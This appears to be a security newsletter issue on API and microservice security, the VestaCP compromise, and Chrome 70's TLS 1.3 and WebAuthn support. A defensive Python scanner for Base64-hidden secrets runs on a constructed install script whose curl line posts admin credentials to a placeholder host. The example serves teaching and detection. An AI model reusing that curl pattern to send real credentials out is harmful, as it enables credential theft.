Vulnerabilities

The Shopify vulnerability happened (and was fixed) back in May 2018. This week, Arif Khan goes into the details of the vulnerability and the lessons we can learn from it for microservices and API security in general. In a nutshell, microservices themselves and the underlying cloud platform expand the attack surface. It is no longer just the perimeter, so you need API security, ideally at the microservice level, and you need to lock down the APIs, methods and data to the bare minimum that you actually require.

VestaCP, a popular open-source web hosting control panel, was hacked and used to launch DDoS attacks. Most likely the software was hacked because its installation script contained Base64-encoded admin credentials and a server URL. Base64 is an encoding, not encryption: anyone who can read the script (or the traffic it generates) can decode them in one step, so this provided no protection at all.
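To make the Base64 point concrete, here is a small scanner, added as an example and not taken from VestaCP or from the original article, that pulls Base64-looking tokens out of a shell script, decodes them, and flags anything that looks like a credential or a URL. The install-script fragment it runs on is constructed for this example (the hostname, credentials and variable names are made up, and the Base64 values are produced in-line so they are guaranteed to decode); it is not VestaCP's real installer.

```python
import base64
import binascii
import re

# A run of 12+ Base64 alphabet characters plus optional padding, not glued to
# other Base64 characters on either side (so we do not grab half a token).
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")

# Words that suggest the decoded text is something an attacker would want.
SECRET_HINTS = ("password", "passwd", "secret", "token", "apikey", "admin", "://")

# user:password shape, e.g. "admin:hunter2"
USER_PASS = re.compile(r"^[\w.@-]+:\S+$")


def _b64(s: str) -> str:
    """Encode a string with standard Base64 (used only to build the sample)."""
    return base64.b64encode(s.encode()).decode()


# Constructed install-script fragment shaped like the case described above.
# Hostname, credentials and variable names are hypothetical.
SAMPLE_SCRIPT = f"""#!/bin/bash
# constructed install-script fragment, not VestaCP's real installer
VERSION=0.9.8
ADMIN_CREDS=$(echo {_b64('admin:P@ssw0rd')} | base64 -d)
REPORT_URL=$(echo {_b64('https://panel.example.invalid/api/register')} | base64 -d)
curl -s "$REPORT_URL" --data "creds=$ADMIN_CREDS"
"""


def decode_base64_tokens(text: str) -> list:
    """Return (token, decoded_text) for every Base64-looking token that
    strictly decodes (correct length and padding) to printable ASCII."""
    found = []
    for match in B64_TOKEN.finditer(text):
        token = match.group(0)
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue  # not real Base64 (bad length/padding), skip it
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            continue  # decodes to binary, not interesting here
        if decoded.isprintable():
            found.append((token, decoded))
    return found


def find_hidden_secrets(text: str) -> list:
    """Decode every Base64 token and keep those that look like credentials or
    endpoints. Returns dicts with the encoded and decoded forms."""
    findings = []
    for token, decoded in decode_base64_tokens(text):
        lowered = decoded.lower()
        if any(hint in lowered for hint in SECRET_HINTS) or USER_PASS.match(decoded):
            findings.append({"encoded": token, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in find_hidden_secrets(SAMPLE_SCRIPT):
        print(f"{finding['encoded']}  ->  {finding['decoded']}")
```

The scanner uses strict decoding (`validate=True`) so that ordinary long words are rejected rather than turned into garbage, and it only reports decoded text that matches a credential or URL heuristic. Run against the constructed script it recovers both the admin credentials and the report URL, which is exactly why "Base64-encoded" offers no confidentiality.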

Standards

Chrome 70, released this week, includes the final version of the TLS 1.3 standard (RFC 8446) and an updated Web Authentication API that allows authentication with Touch ID on macOS and the fingerprint sensor on Android.

Technology deep dive

Opinions

Fernando Serto from Akamai talks about (among many other fascinating things, such as protection against bots and distributed password attacks) how the transition from websites to mobile apps makes APIs the primary means of access, so traditional web application security no longer suffices. Instead, we need API-specific authentication, authorization, and analytics.